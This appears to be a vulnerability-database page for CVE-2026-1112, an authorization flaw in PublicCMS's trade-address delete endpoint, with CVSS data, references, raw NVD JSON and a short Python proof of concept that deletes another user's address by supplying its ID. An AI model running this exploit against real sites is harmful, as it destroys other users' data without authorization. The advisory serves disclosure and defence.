CVE-2026-1112

Description

A vulnerability was found in Sanluan PublicCMS up to 5.202506.d. Affected is the function delete of the file publiccms-trade/src/main/java/com/publiccms/controller/web/trade/TradeAddressController.java of the component Trade Address Deletion Endpoint. Performing a manipulation of the argument ids results in improper authorization. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:publiccms:publiccms:*:*:*:*:*:*:*:* - VULNERABLE

Sanluan PublicCMS < 5.202506.d

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-1112 PoC - Sanluan PublicCMS Trade Address Deletion Authorization Bypass
# Target: Sanluan PublicCMS up to version 5.202506.d
# Vulnerability: Improper Authorization in TradeAddressController delete method

TARGET_URL = "http://target.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/login"
DELETE_URL = f"{TARGET_URL}/trade/address/delete"

# Step 1: Login to obtain session
login_data = {
    "username": "attacker",
    "password": "password123"
}

session = requests.Session()
response = session.post(LOGIN_URL, json=login_data)

if response.status_code == 200:
    print("[+] Login successful, obtained valid session")
    
    # Step 2: Exploit - Delete victim address by manipulating ids parameter
    # Replace TARGET_ADDRESS_ID with the address ID you want to delete
    exploit_data = {
        "ids": [TARGET_ADDRESS_ID]  # Victim's address ID to delete
    }
    
    exploit_response = session.post(DELETE_URL, json=exploit_data)
    
    if exploit_response.status_code == 200:
        print("[+] Authorization bypass successful - Address deleted")
        print(f"[*] Deleted address ID: {TARGET_ADDRESS_ID}")
    else:
        print(f"[-] Exploit failed with status: {exploit_response.status_code}")
else:
    print("[-] Login failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1112
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1112
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1112/
[4] VulDB https://vuldb.com/cve/CVE-2026-1112
[5] https://github.com/AnalogyC0de/public_exp/issues/4
[6] https://vuldb.com/?ctiid.341704
[7] https://vuldb.com/?id.341704
[8] https://vuldb.com/?submit.732771
[9] https://github.com/AnalogyC0de/public_exp/issues/4

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1112", "sourceIdentifier": "[email protected]", "published": "2026-01-18T07:16:03.343", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Sanluan PublicCMS up to 5.202506.d. Affected is the function delete of the file publiccms-trade/src/main/java/com/publiccms/controller/web/trade/TradeAddressController.java of the component Trade Address Deletion Endpoint. Performing a manipulation of the argument ids results in improper authorization. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en Sanluan PublicCMS hasta la versión 5.202506.d. Afectada es la función delete del archivo publiccms-trade/src/main/java/com/publiccms/controller/web/trade/TradeAddressController.java del componente Trade Address Deletion Endpoint. Realizar una manipulación del argumento ids resulta en autorización indebida. El ataque puede ser iniciado de forma remota. El exploit ha sido hecho público y podría ser utilizado. El proveedor fue contactado tempranamente sobre esta divulgación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 5.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:publiccms:publiccms:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.202506.d", "matchCriteriaId": "B937509A-33F9-4B58-9E04-4297591A198E"}]}]}], "references": [{"url": "https://github.com/AnalogyC0de/public_exp/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid ... (truncated)